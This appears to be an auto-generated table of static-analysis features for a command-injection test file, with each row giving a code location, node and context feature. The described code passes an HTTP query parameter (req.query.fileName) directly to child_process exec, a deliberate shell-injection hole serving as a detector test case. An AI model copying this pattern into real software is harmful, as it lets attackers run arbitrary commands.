autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:9:86:10 | exceptional return of app.use ... }) | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:9:86:10 | exceptional return of app.use ... }) | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:9:86:10 | exceptional return of app.use ... }) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:13:82:15 | use | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:13:82:15 | use | contextSurroundingFunctionParameters | (app) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:13:82:15 | use | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:13:82:15 | use | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:13:82:15 | use | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:82:16 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:82:16 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:82:16 | cp | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:82:16 | cp | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:82:16 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:82:16 | require | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:82:16 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:82:16 | require | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:82:16 | require | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:82:16 | require | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:82:16 | this | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:82:16 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:82:16 | this | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:82:16 | this | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:82:16 | this | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:86:9 | 'arguments' object of anonymous function | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:86:9 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:86:9 | 'arguments' object of anonymous function | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:86:9 | 'arguments' object of anonymous function | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:86:9 | 'arguments' object of anonymous function | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:86:9 | exceptional return of anonymous function | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:86:9 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:86:9 | exceptional return of anonymous function | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:86:9 | exceptional return of anonymous function | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:86:9 | exceptional return of anonymous function | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:86:9 | functio ... } | CalleeFlexibleAccessPath | app.use | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:86:9 | functio ... } | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:86:9 | functio ... } | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:86:9 | functio ... } | contextSurroundingFunctionParameters | (app)\n(req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:86:9 | functio ... } | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:86:9 | functio ... } | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:86:9 | functio ... } | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:86:9 | functio ... } | receiverName | app | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:86:9 | return of anonymous function | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:86:9 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:86:9 | return of anonymous function | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:86:9 | return of anonymous function | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:17:86:9 | return of anonymous function | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:27:82:29 | req | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:27:82:29 | req | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:27:82:29 | req | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:27:82:29 | req | contextSurroundingFunctionParameters | (app)\n(req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:27:82:29 | req | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:27:82:29 | req | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:27:82:29 | req | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:27:82:29 | req | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:27:82:29 | req | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:27:82:29 | req | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:32:82:34 | res | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:32:82:34 | res | contextSurroundingFunctionParameters | (app)\n(req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:32:82:34 | res | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:32:82:34 | res | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:32:82:34 | res | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:37:82:40 | next | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:37:82:40 | next | contextSurroundingFunctionParameters | (app)\n(req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:37:82:40 | next | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:37:82:40 | next | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:37:82:40 | next | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:11:83:12 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:11:83:12 | cp | contextSurroundingFunctionParameters | (app)\n(req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:11:83:12 | cp | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:11:83:12 | cp | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:11:83:12 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:11:83:17 | cp.exec | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:11:83:17 | cp.exec | contextSurroundingFunctionParameters | (app)\n(req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:11:83:17 | cp.exec | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:11:83:17 | cp.exec | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:11:83:17 | cp.exec | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:11:83:37 | cp.exec ... leName) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:11:83:37 | cp.exec ... leName) | contextSurroundingFunctionParameters | (app)\n(req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:11:83:37 | cp.exec ... leName) | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:11:83:37 | cp.exec ... leName) | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:11:83:37 | cp.exec ... leName) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:11:83:37 | exceptional return of cp.exec ... leName) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:11:83:37 | exceptional return of cp.exec ... leName) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:11:83:37 | exceptional return of cp.exec ... leName) | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:11:83:37 | exceptional return of cp.exec ... leName) | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:11:83:37 | exceptional return of cp.exec ... leName) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:14:83:17 | exec | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:14:83:17 | exec | contextSurroundingFunctionParameters | (app)\n(req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:14:83:17 | exec | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:14:83:17 | exec | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:14:83:17 | exec | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:19:83:21 | req | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:19:83:21 | req | contextSurroundingFunctionParameters | (app)\n(req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:19:83:21 | req | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:19:83:21 | req | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:19:83:21 | req | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:19:83:27 | req.query | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:19:83:27 | req.query | contextSurroundingFunctionParameters | (app)\n(req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:19:83:27 | req.query | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:19:83:27 | req.query | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:19:83:27 | req.query | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:19:83:36 | req.query.fileName | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:19:83:36 | req.query.fileName | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:19:83:36 | req.query.fileName | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:19:83:36 | req.query.fileName | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:19:83:36 | req.query.fileName | contextSurroundingFunctionParameters | (app)\n(req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:19:83:36 | req.query.fileName | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:19:83:36 | req.query.fileName | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:19:83:36 | req.query.fileName | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:19:83:36 | req.query.fileName | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:23:83:27 | query | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:23:83:27 | query | contextSurroundingFunctionParameters | (app)\n(req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:23:83:27 | query | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:23:83:27 | query | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:23:83:27 | query | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:29:83:36 | fileName | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:29:83:36 | fileName | contextSurroundingFunctionParameters | (app)\n(req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:29:83:36 | fileName | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:29:83:36 | fileName | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:83:29:83:36 | fileName | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:17 | require | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:17 | require | contextSurroundingFunctionParameters | (app)\n(req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:17 | require | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:17 | require | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:17 | require | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:31 | exceptional return of require ... b-lib") | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:31 | exceptional return of require ... b-lib") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:31 | exceptional return of require ... b-lib") | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:31 | exceptional return of require ... b-lib") | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:31 | exceptional return of require ... b-lib") | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:31 | require ... b-lib") | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:31 | require ... b-lib") | contextSurroundingFunctionParameters | (app)\n(req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:31 | require ... b-lib") | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:31 | require ... b-lib") | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:31 | require ... b-lib") | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:35 | require ... b").foo | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:35 | require ... b").foo | contextSurroundingFunctionParameters | (app)\n(req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:35 | require ... b").foo | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:35 | require ... b").foo | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:35 | require ... b").foo | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:55 | exceptional return of require ... leName) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:55 | exceptional return of require ... leName) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:55 | exceptional return of require ... leName) | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:55 | exceptional return of require ... leName) | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:55 | exceptional return of require ... leName) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:55 | require ... leName) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:55 | require ... leName) | contextSurroundingFunctionParameters | (app)\n(req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:55 | require ... leName) | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:55 | require ... leName) | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:11:85:55 | require ... leName) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:19:85:30 | "my-sub-lib" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:19:85:30 | "my-sub-lib" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:19:85:30 | "my-sub-lib" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:19:85:30 | "my-sub-lib" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:19:85:30 | "my-sub-lib" | contextSurroundingFunctionParameters | (app)\n(req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:19:85:30 | "my-sub-lib" | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:19:85:30 | "my-sub-lib" | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:19:85:30 | "my-sub-lib" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:33:85:35 | foo | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:33:85:35 | foo | contextSurroundingFunctionParameters | (app)\n(req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:33:85:35 | foo | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:33:85:35 | foo | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:33:85:35 | foo | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:37:85:39 | req | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:37:85:39 | req | contextSurroundingFunctionParameters | (app)\n(req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:37:85:39 | req | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:37:85:39 | req | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:37:85:39 | req | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:37:85:45 | req.query | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:37:85:45 | req.query | contextSurroundingFunctionParameters | (app)\n(req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:37:85:45 | req.query | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:37:85:45 | req.query | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:37:85:45 | req.query | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:37:85:54 | req.query.fileName | CalleeFlexibleAccessPath | import(!).foo | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:37:85:54 | req.query.fileName | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:37:85:54 | req.query.fileName | calleeImports | my-sub-lib | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:37:85:54 | req.query.fileName | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:37:85:54 | req.query.fileName | contextSurroundingFunctionParameters | (app)\n(req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:37:85:54 | req.query.fileName | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:37:85:54 | req.query.fileName | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:37:85:54 | req.query.fileName | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| 